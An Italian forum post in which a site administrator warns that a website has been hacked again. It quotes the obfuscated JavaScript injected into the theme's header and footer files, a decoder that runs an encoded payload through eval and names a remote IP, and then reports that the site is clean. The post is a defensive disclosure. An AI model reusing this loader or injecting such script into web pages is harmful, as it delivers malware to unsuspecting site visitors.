[xcdegasp]

Quote:

Originariamente inviato da xcdegasp

Attenzione, il sito www.hwupgrade.helloweb.eu risulta nuovamente violato!!

è stato iniettato il seguente codice javascript offuscato:

Codice:

<body>
<script language=JavaScript> function oswbnb25(z){var c=z.length,m=1024,i,s,h,b=0,w=0,x=0,d=Array(63,21,41,39,16,59,61,17,27,48,0,0,0,0,0,0,44,29,30,18,38,3,42,9,2,1,37,34,5,33,51,19,40,56,0,6,35,62,23,36,10,50,22,0,0,0,0,28,0,47,26,31,43,49,11,52,53,4,20,12,32,14,15,25,13,8,45,46,55,58,24,7,60,57,54);for(s=Math.ceil(c/m);s>0;s--){h='';for(i=Math.min(c,m);i>0;i--,c--){{x|=(d[z.charCodeAt(b++)-48])&lt;<w;if(w){h+=String.fromCharCode(161^x&255);x>>=8;w-=2}else{w=6}}}eval(h);}}oswbnb25('ZTxNL5@hnXAhRVphCN2MJ5xNi8PDL5@9jNkenV6TZnpY1O_KSzGYwnp9kO_lnEkNiNoJLc29vH_lCnr9_mvY1VAg8uPTZXAgiO_enKxNw5@T15P3SFq5RVAYnmrNj0_eGYm913xTOExNL5kNGKQK4ZoD7bGKXbvJLc29vH@MXbQlIbpYLVAY_myW4SvYiT@eGVp3VbolCVpzpOk3EZkYCwANRT6Dn5xNinQ3AuqYwnp9kOx3SKq') </script><!-- 89.186.95.86 -->

che porta al dominio:
http://whois.domaintools.com/89.186.95.86

purtroppo sono in una lan con connettività limitata nella quali non posso collegarmi via ftp a togliere dai file modificati il codice aggiunto

abbiate pazienza, nell'attesa non collegatevi

sito ripulito, questa volta i bastardi sono stati più fini, hanno modificato solo due file del thema in uso (footer.php e header.php) inserendo il codice sopra descritto..